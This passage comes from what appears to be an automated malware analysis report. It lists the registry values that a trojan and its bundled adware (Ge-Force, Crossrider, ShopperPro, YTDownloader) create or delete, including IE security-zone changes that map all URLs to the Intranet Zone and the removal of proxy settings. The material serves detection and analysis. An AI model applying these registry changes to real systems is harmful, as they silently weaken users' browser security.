"Seed" = "E3 CB 0F 8E AD F4 71 9C 28 36 D2 57 6F CE 3B 65"

The process ping.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 DE BE D4 87 D2 99 5B BE 34 9D AC 22 E9 9E C2"

The process ping.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 03 DB 9F 88 86 BC F1 04 9F 05 35 FA 63 0A 75"

The process ping.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D4 C0 56 0C BA 47 F7 E1 0B F6 AF AE 24 09 7E"

The process ping.exe:3660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CC 85 11 45 11 37 88 EE F6 78 7A 2B AE 88 0B"

The process ping.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 38 70 EA 06 56 B3 55 54 E9 25 93 5E 3F 26 3E"

The process ping.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 9B 7C 96 A0 C2 55 A1 41 DE 09 8C 41 09 82 CA"

The process ping.exe:2936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FF BC DA AA AA 4D DB 93 B5 F1 47 CF E1 CF 64"

The process ping.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 B9 EA FF 12 57 54 66 21 18 AC 0A 2C 73 B4 B4"

The process ping.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 23 1E E8 48 D4 F0 48 A1 E9 39 04 2D D6 EC 34"

The process ping.exe:2192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 68 D0 41 E5 81 FB 7A 28 33 11 BE 12 4A ED"

The process ping.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 77 78 13 54 0B 10 F2 77 8A D8 71 83 01 B1 47"

The process ping.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 80 56 CA 89 1B 86 1A 75 55 63 46 C7 6E 2D B5"

The process ping.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D FD 01 25 D4 6D 37 3A 06 96 A6 0A A6 DC 24 A4"

The process ping.exe:3984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 50 80 F0 6A 91 53 75 C6 52 16 C4 49 25 38 93"

The process ping.exe:2828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 12 59 B8 2A 7D 56 B5 78 06 45 5F 11 02 8E FC"

The process ping.exe:2944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 85 23 5B DD F2 54 69 FD 86 47 BA 32 65 7B 8E"

The process ping.exe:2820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 11 B9 8F 6F 79 A5 8C 92 8F 46 58 E7 F7 C4 58"

The process ns19.tmp:3928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process ins_sense.exe:2400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 1D DD 77 23 69 22 32 BC 0B 95 93 51 97 50 CA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"f.exe" = "f"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process find.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process f.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\20891\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 E9 D8 4B 90 A1 0A 74 2C 6D 18 95 17 EC 64 91"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\InstalledBrowserExtensions\20891]
"70299" = "SensePlus.V2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"8593.bat" = "8593"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Wiwyiyugmbkl.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "70881"
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\InstalledBrowserExtensions\Webar]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "13b4b43ecfec3569c696888aa234740eIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 A5 46 9E 60 4A CA 96 E2 36 16 28 E1 B3 05 8A"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "e779ddeb30ff0167256d26524544a5f7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "Webar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sc.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net.exe:3464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net1.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net1.exe:3552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process setup.exe:2060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 FB 84 C4 1A 13 93 57 77 F0 B7 5F 64 41 9F 5D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm6.tmp\AccDownload.dll,"

The process setup.exe:3052 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&LangID=x&Ext=%s"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"
"Version" = "1.0.8654.1177"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"UninstallString" = "%Program Files%\YTDownloader\YTDUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&LangID=x&Ext=%s"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"Publisher" = "YTDownloader"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 00 A7 10 39 BE 33 FF EB BF 36 A2 03 82 49 DC"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&LangID=x&Ext=%s&"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.8654.1177"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayIcon" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
